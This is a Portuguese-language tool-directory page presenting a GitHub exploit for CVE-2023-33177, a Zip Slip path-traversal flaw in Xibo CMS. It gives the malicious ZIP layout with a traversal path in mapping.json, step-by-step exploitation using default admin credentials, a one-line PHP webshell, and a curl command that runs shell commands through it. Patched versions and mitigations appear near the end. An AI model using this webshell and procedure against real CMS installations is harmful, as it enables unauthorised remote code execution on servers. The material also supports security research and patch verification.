Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

Este exploit demonstra uma **vulnerabilidade de path traversal** no Xibo CMS (CVE-2023-33177) que permite execução remota de código através de importações maliciosas de layout.

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit Xibo CMS Zip Slip RCE CVE-2023-33177

Este exploit demonstra uma vulnerabilidade de path traversal no Xibo CMS (CVE-2023-33177) que permite execução remota de código através de importações maliciosas de layouts.

Detalhes da Vulnerabilidade

CVE/Advisory: CVE-2023-33177 Versões Afetadas:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

Tipo de Vulnerabilidade: Path Traversal (Zip Slip) Impacto: Execução Remota de Código (RCE)

Resumo Técnico

O Xibo CMS permite que usuários autenticados importem arquivos de layout via arquivos ZIP. A funcionalidade de importação não valida adequadamente os caminhos de arquivo no arquivo mapping.json, permitindo que um atacante escreva arquivos fora do diretório de biblioteca pretendido usando sequências de path traversal (../../).

Como o Exploit Funciona

  1. Cria uma estrutura de exportação de layout Xibo válida com os arquivos JSON necessários
  2. Injeta path traversal no : Usa como o caminho do arquivo
mapping.json
../../web/shell.php
  • Coloca webshell no caminho percorrido dentro da estrutura ZIP em library/../../web/shell.php
  • Xibo extrai sem validação: Resolve para /var/www/cms/web/shell.php
  • Alcança RCE: Webshell fica acessível na raiz web
  • A Cadeia de Vulnerabilidade

    root@kitploit:~
    ZIP contém: library/../../web/shell.php
    Xibo lê:   library/ + ../../web/shell.php (do mapping.json)
    Xibo escreve:  /var/www/cms/library/temp/ + ../../web/shell.php
    Resultado:       /var/www/cms/web/shell.php ← Webshell na raiz web!
    

    Uso

    Gerar o Exploit

    root@kitploit:~
    python3 create_exploit.py
    

    Isso cria exploit.zip contendo o pacote de layout malicioso.

    Passos de Exploração

    1. Acesse o Xibo CMS e faça login com as credenciais (padrão: xibo_admin / password)
    2. Navegue até Importar: Design → Layouts → Importar
    3. Envie o exploit.zip
    4. Ignore quaisquer erros JSON - o webshell já foi escrito no disco
    5. Execute comandos via webshell:
      root@kitploit:~
      curl 'http://localhost:8080/shell.php?cmd=id'
      

    Estrutura de Arquivos

    O ZIP do exploit contém:

    root@kitploit:~
    exploit.zip
    ├── layout.json          # Definição de layout Xibo válida
    ├── playlist.json        # Playlist vazia (aciona importação JSON)
    ├── mapping.json         # Contém payload de path traversal
    └── library/
        └── ../../web/
            └── shell.php    # Webshell PHP (é extraído para a raiz web)
    

    Funcionalidade do Webshell

    O webshell embutido é mínimo:

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    

    Acesso via: http://<alvo>/shell.php?cmd=<comando>

    Mitigação

    Versões Corrigidas:

    • Atualize para Xibo CMS 2.3.17+ (para o branch 2.x)
    • Atualize para Xibo CMS 3.3.5+ (para o branch 3.x)

    Estratégias de Mitigação:

    1. Valide todos os caminhos de arquivo em arquivos ZIP antes da extração
    2. Rejeite caminhos contendo .. ou caminhos absolutos
    3. Use métodos de extração seguros que impeçam directory traversal
    4. Implemente validação de entrada adequada na funcionalidade de importação
    5. Restrinja permissões de upload de arquivos apenas para usuários autenticados e autorizados

    Aviso Legal e Ético

    Este exploit é fornecido para:

    • Fins educacionais
    • Competições CTF
    • Testes de segurança autorizados
    • Pesquisa de segurança defensiva

    Não use este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

    Referências

    • Advisory: GHSA-jj27-x85q-crqv
    • Xibo CMS: https://xibo.org.uk/
    • Vulnerabilidade Zip Slip: https://security.snyk.io/research/zip-slip-vulnerability
    • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

    Autor

    complexusprada Novembro de 2025

    Baixar ferramenta